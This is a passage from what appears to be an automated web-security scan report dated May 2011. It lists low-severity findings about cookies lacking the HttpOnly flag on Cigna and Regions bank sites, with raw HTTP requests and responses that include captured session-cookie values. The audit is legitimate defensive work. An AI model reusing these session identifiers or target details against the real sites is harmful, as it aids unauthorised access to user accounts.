Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
8.18. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /portal/images/arrowonly_gold.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/arrowonly_gold.gif HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 63
content-type: image/gif
date: Mon, 16 May 2011 15:35:50 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal; Path=/

GIF89a.............!.......,................|..@.fm.s..a...f..;
8.19. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:36 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...
8.20. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=68E806DE7FD1107F11DEAFC5F6A8CE37; TLTUID=68E806DE7FD1107F11DEAFC5F6A8CE37; MYCIGNA_OEP_JSESSIONID=0000gya5ooLNN8su43COFm2xuVB:15ngp3vj1; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:26 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...
8.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotpassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:15 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
8.22. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:16 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_d992271a-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
8.23. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
8.24. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
8.25. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/
Cache-Control: max-age=0
Origin: https://my.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:33 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:33 GMT
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
8.26. http://regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 302 Redirect
Set-Cookie: WWW.REGIONS.COM-HTTP=R2564757028; path=/
Content-Length: 146
Content-Type: text/html
Location: https://www.regions.com
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:51 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.regions.com">here</a></body>
8.27. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
8.28. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: secureapps.regions.com-ssl=R54983192; WT_FPC=id=2125ecebef9cc3240da1305556579133:lv=1305556579133:ss=1305556579133

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:40 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
8.29. https://secureapps.regions.com/OAO/DESGetFiles.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OAO/DESGetFiles.aspx?type=styles&version=63438902696&files=13 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 804

.VAMErrorText
{
}

.VAMBlinkText
{
color: White;
}

.VAMFieldWithError
{
}

.VAMValSummary
{
color: red;
}

.VAMValSummary:link {color: red; text-decoration: none;}
.VAMValSum
...[SNIP]...
8.30. https://secureapps.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 404 Not Found
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
8.31. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/DES/Appearance/Validation/Validation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/DES/Appearance/Validation/Validation.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1529
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...
8.32. https://secureapps.regions.com/oao/ErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/ErrorPage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/ErrorPage.aspx HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:21:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 9876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
8.33. https://secureapps.regions.com/oao/FormHandler.js  previous  next

Summary

